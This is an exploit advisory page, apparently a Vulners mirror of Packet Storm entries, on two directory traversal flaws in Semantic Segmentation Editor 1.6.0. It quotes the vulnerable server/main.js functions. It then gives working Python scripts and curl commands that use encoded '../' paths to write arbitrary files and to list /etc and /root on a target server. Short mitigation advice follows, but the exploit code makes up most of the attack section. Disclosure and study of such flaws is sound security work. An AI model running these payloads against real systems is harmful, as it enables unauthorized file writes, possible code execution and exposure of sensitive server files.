Vulners
Lucene search
Semantic Segmentation Editor 1.6.0 Directory Traversal
🗓️ 17 Mar 2025 00:00:00Reported by Halil İlhan, Fatih TürütType 
packetstorm🔗 packetstorm.news👁 222 Views
**Exploit Title:** Semantic Segmentation Editor 1.6.0 - Directory Traversal File Upload
**Date:** 2025-03-14
**Exploit Author:** Fatih Türüt ([defendzero.com](https://defendzero.com))
**Vendor Homepage:** [Hitachi Automotive & Industry Lab](https://github.com/Hitachi-Automotive-And-Industry-Lab/semantic-segmentation-editor)
**Software Download:** [Semantic Segmentation Editor 1.6.0](https://github.com/Hitachi-Automotive-And-Industry-Lab/semantic-segmentation-editor/archive/refs/tags/1.6.0.zip)
**Version:** 1.6.0
**Tested on:** macOS 24.3.0
**Category:** Webapps
**CVE:** N/A
---
## **Description:**
A **directory traversal vulnerability** exists in **Semantic Segmentation Editor 1.6.0** due to improper path validation in the file upload functionality.
This flaw allows an attacker to manipulate file paths and write arbitrary files outside the intended directory on the server.
### **Vulnerable Component:**
- **File:** `server/main.js`
- **Function:** `'saveData'(sample)`
- **Issue:** User input is decoded and processed without validating whether the file remains inside the allowed directory.
### **Vulnerable Code:**
```javascript
'saveData'(sample) {
if (demoMode) return;
const attrs = url.parse(sample.url);
let path = decodeURIComponent(attrs.pathname);
sample.folder = path.substring(1, path.lastIndexOf("/"));
sample.file = path.substring(path.lastIndexOf("/") + 1);
// No path validation is performed
}
```
---
## **Proof of Concept (PoC):**
An attacker can exploit this vulnerability by crafting a request to save files outside the intended directory.
### **Exploit Script (Python)**
```python
import requests
# Target file path
target_path = "../../../tmp/malicious.txt"
encoded_path = target_path.replace("../", "%2f..%2f")
url = f"http://target:3000/save/{encoded_path}"
content = "Malicious content here"
# Send content directly
response = requests.post(url, data=content)
print(response.text)
```
---
### **Example curl Command:**
```bash
curl -X POST -d "Malicious content here" "http://target:3000/save/%2f..%2f..%2f..%2ftmp%2fmalicious.txt"
```
---
## **Impact:**
Successful exploitation allows an attacker to write arbitrary files to the server, potentially leading to remote code execution (RCE) if an executable file is placed in a web-accessible directory.
### **Mitigation:**
The vendor should implement proper path validation and restrict file writes to the intended directory using functions like `path.resolve()` or `path.normalize()` in Node.js.
---
----------------------------------------
Title: Semantic Segmentation Editor 1.6.0 - Directory Traversal Vulnerability
Description:
A directory traversal vulnerability exists in **Semantic Segmentation Editor 1.6.0** due to improper path validation. An attacker can manipulate the directory browsing endpoint to list arbi
trary directories on the server.
Source URL: https://github.com/Hitachi-Automotive-And-Industry-Lab/semantic-segmentation-editor
Source Name/Email: Halil İbrahim İlhan ([email protected])
CVEs: N/A
Software URL: https://github.com/Hitachi-Automotive-And-Industry-Lab/semantic-segmentation-editor/archive/refs/tags/1.6.0.zip
Vulnerable Component:
- **File:** server/main.js
- **Function:** 'images'(folder, pageIndex, pageLength)
- **Issue:** The application decodes user input without validating if it stays within the intended directory scope.
Vulnerable Code:
```javascript
'images'(folder, pageIndex, pageLength) {
const folderSlash = folder ? decodeURIComponent(folder) + "/" : "/";
const leaf = join(config.imagesFolder, (folderSlash ? folderSlash : ""));
// No path validation is performed before accessing the directory
const dirs = getDirectories(leaf);
const images = getImages(leaf);
}
### **Proof of Concept (PoC): An attacker can exploit this vulnerability by sending specially crafted requests. The following Python script demonstrates the exploitation of the vulnerabilit
y:**
import requests
def list_directory(path):
"""Exploit for directory traversal vulnerability in Semantic Segmentation Editor 1.6.0."""
encoded_path = path.replace("../", "%2f..%2f")
url = f"http://target:3000/browse/0/20/{encoded_path}"
response = requests.get(url)
print(f"Listing contents of: {path}")
return response.text
if __name__ == "__main__":
print(list_directory("../../../etc")) # List /etc directory
print(list_directory("../../../root")) # List /root directory
### **Example curl commands:**
# List /etc directory
curl -i "http://target:3000/browse/0/20/%2f..%2f..%2f..%2fetc"
# List /root directory
curl -i "http://target:3000/browse/0/20/%2f..%2f..%2f..%2froot"Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Mar 2025 00:00Current
7.5High risk
Vulners AI Score7.5